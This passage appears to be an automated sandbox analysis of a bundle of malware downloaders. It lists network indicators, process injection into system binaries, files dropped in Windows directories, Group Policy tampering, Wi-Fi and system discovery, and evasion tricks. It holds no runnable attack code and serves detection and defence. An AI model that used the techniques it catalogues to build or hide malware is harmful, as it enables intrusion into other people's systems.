N/A pastebin.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A bitbucket.org N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ipapi.co N/A N/A
N/A ipapi.co N/A N/A
N/A ipapi.co N/A N/A
N/A ip-api.com N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ipapi.co N/A N/A
N/A ipapi.co N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\BingWallpaperApp\\WPImages\\20241214.jpg" C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2148 set thread context of 4604 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 2864 set thread context of 4396 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4760 set thread context of 4488 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 5272 set thread context of 1348 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 5132 set thread context of 5168 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe C:\Windows\system32\svchost.exe
PID 5132 set thread context of 5228 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe C:\Windows\system32\audiodg.exe
PID 5132 set thread context of 4356 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe C:\Windows\system32\msiexec.exe
PID 6408 set thread context of 6292 N/A C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
PID 6736 set thread context of 4176 N/A C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 6544 set thread context of 4344 N/A C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files (x86)\seetrol\client\sas.dll C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files (x86)\seetrol\client\SeetrolMyService.exe C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files (x86)\seetrol\client\Seetrol_Clt.exe C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
File created C:\Program Files (x86)\seetrol\client\sthooks.dll C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe N/A
File created C:\Program Files (x86)\seetrol\client\SeetrolClient.exe C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\sysnldcvmr.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe N/A
File created C:\Windows\SystemTemp\~DF793DC10DA9572D25.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFB6B.tmp-\CustomAction.config C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\Installer\SourceHash{240D9941-B463-4B9C-B483-7129740B9AC1} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFB6B.tmp-\DispatchQueue.dll C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\SystemTemp\~DFDFB63DB7F55637BF.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\InternshipWant C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe N/A
File opened for modification C:\Windows\GovernmentalPoetry C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe N/A
File opened for modification C:\Windows\Installer\e5af28f.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF7A1.tmp-\Microsoft.Deployment.WindowsInstaller.dll C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIFB6B.tmp-\CustomActions.dll C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\MoBelongs C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe N/A
File opened for modification C:\Windows\Installer\MSIF406.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF7A1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF7A1.tmp-\CustomAction.config C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIFB6B.tmp-\Microsoft.Deployment.WindowsInstaller.dll C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\JpegSuse C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DFE6D59846241A2593.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Windows\Installer\e5af28f.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFB6B.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF4EF8ECC2C6C84C85.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5af293.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF7A1.tmp-\CustomActions.dll C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIF7A1.tmp-\DispatchQueue.dll C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\JpgCelebrity C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe N/A
File created C:\Windows\sysnldcvmr.exe C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A

Browser Information Discovery

discovery

Command and Scripting Interpreter: JavaScript

execution

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Embeds OpenSSL

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\BWCStartMSI.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\downloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\sysnldcvmr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\3076928777.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
